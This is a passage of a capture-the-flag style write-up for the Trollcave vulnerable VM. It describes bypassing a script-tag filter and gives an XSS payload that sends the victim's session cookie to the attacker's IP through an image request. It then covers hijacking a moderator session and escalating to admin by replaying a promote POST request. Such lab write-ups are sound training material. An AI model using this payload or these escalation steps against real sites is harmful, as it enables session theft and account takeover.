ofasgard/VulnVMWriteUps/TrollCave.md

 Although there is a rudimentary WAF in place, circumventing it didn't take much.
 The `<script>` tag is filtered out of any post or comment, but all you need to do is include an attribute (i.e. `<script id=test>`) and it will go through.
 After some tinkering, I deduced that the session cookie is not protected in any way, and that stealing it will let you hijack a user's session - even if they click the logout button.
 To that end, I crafted the following XSS injection:

 `<SCRIPT id=test>document.write('<img src="http://192.168.56.1/collect.gif?cookie=' + document.cookie + '" />')</SCRIPT>`

+All I needed on the backend was a simple little Python script to collect the cookies being sent to my IP address.
+My assumption was correct - the page was being periodically accessed by cooldude89, and I shortly harvested his cookie and used it to log in as him.
+Now as moderator, I was able to set my sights on a higher prized.

+## Escalating from Moderator

+Above the role of moderator, there were two roles I didn't yet have access to: admin and superadmin.
+Once again, the blogs provided a valuable hint.
+This time, it came in the form of a blog post visible only to moderators that documents a "promote" functionality.
+Basically, any moderator can "promote" any regular member into a moderator.
+This is handy for escalating xer into a mod so I don't have to modify a cookie every time I want to log in, but it doesn't help me get to admin... or does it?

+When you promote someone to moderator, a POST request is made to a URI that looks something like `/users/12/mod`.
+After you've promoted them, the "mod" button goes away.
+This stops you from promoting someone who has already been promoted - but what if you just replay the POST request?
+By making a request to promote someone who is already a moderator, it is possible to promote them into an admin.
+The only catch is that you can't do it to yourself - so I promoted xer into a mod, then an admin.

+## Escalating from Admin

+Only one hurdle remains: the superadmin account.
+There is only one superadmin: King.
+As before, Trollcave has a hint for us.
+I had suspected that the file upload functionality - which is disabled - would eventually be how I got code execution.
+This was all but confirmed by an admin-only post which indicated that it was disabled due to "security concerns", and that only the superadmin could enable it.
+Another admin-only blog post informed us that King has quit to "find himself", and that dragon has taken his account - so we need to escalate laterally to his account.
+Whoever has King has access to the file upload functionality, which is the way in.